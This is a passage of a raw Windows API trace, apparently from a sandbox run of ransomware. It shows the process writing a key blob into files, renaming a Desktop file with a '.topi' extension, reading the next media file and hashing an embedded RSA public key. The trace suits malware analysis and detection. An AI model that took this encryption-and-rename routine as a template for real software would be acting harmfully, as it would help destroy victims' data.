[0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91c8 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.716] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.716] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.717] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.717] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9180 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9168 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3e80 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.718] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.719] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x265e, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x265e, lpOverlapped=0x0) returned 1 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.719] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2663, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.719] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.719] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.719] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.720] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.720] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.720] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.720] CloseHandle (hObject=0x6a8) returned 1 [0094.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.721] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wQWF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wqwf.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wQWF.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wqwf.mp3.topi")) returned 1 [0094.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.722] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.723] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba7e40, ftCreationTime.dwHighDateTime=0x1d5bdbd, ftLastAccessTime.dwLowDateTime=0xe3f57330, ftLastAccessTime.dwHighDateTime=0x1d5bad2, ftLastWriteTime.dwLowDateTime=0xe3f57330, ftLastWriteTime.dwHighDateTime=0x1d5bad2, nFileSizeHigh=0x0, nFileSizeLow=0x15d97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xfD1AXfX.mp4", cAlternateFileName="")) returned 1 [0094.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.723] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xfD1AXfX.mp4") returned=".mp4" [0094.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xfD1AXfX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xfd1axfx.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.724] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=89495) returned 1 [0094.724] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.727] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15d71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.727] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.750] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.750] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x15d97, lpOverlapped=0x0) returned 1 [0094.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.751] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.752] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.752] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.752] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.752] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.752] GetLastError () returned 0x0 [0094.752] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.752] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.752] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.752] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.752] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15da0) returned 0x9a06a00 [0094.753] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3e80 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9168 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3ec8 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.754] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91c8 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d91b0 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.754] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.755] GetCurrentThreadId () returned 0x8c4 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e2120 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.755] GetCurrentThreadId () returned 0x8c4 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: 